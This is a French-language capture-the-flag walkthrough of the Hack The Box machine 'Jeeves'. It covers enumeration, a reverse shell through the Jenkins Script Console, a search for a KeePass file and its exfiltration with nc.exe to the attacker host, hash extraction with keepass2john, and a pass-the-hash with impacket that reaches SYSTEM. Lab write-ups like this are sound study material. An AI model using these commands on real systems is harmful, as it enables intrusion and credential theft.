Jeeves

jenkins kdbx

• Nom machine : Jeeves

• Difficulté : Moyenne

• OS : Windows

Enumération

NMAP

PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (50000) : jeeves

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.63:50000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,pdf,txt,js,json
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,pdf,txt,js,json
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

Accès initial

Manage Jenkins --> Script Console

Online - Reverse Shell Generatorwww.revshells.com

--> Groovy - shell = cmd

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

Elévation des privilèges

C:\Users\Administrator\.jenkins>powershell -c "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"
powershell -c "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"


    Directory: C:\Users\kohsuke\Documents


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx                

Nous allons le transférer sur notre kali. Pour cela nous allons télécharger nc.exe sur la cible puis nous pouvons transférer le fichier.

┌──(kali㉿kali)-[~/htb/jeeves]
└─$ nc -lnvp 1238 > CEH.kdbx
listening on [any] 1238 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.63] 49682

C:\Users\kohsuke\Documents>nc.exe 10.10.14.12 1238 < CEH.kdbx
nc.exe 10.10.14.12 1238 < CEH.kdbx

Nous essayons d'ouvrir le fichier mais celui-ci est protégé par un mot de passe. NOus allons tenter de le cracker.

┌──(kali㉿kali)-[~/htb/jeeves]
└─$ keepass2john CEH.kdbx   
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

──(kali㉿kali)-[~/htb/jeeves]
└─$ echo 'CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48' > hash.txt

Nous avons maintenant accès à la base de donnée. Nous avons testé tous les mots de passe à l'aide de crackmapexec mais sans résultat. Le dernier est un hash. Celui-ci fonctionne.

┌──(kali㉿kali)-[~/htb/jeeves]
└─$ impacket-smbexec administrator@10.10.10.63 -hashes 'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system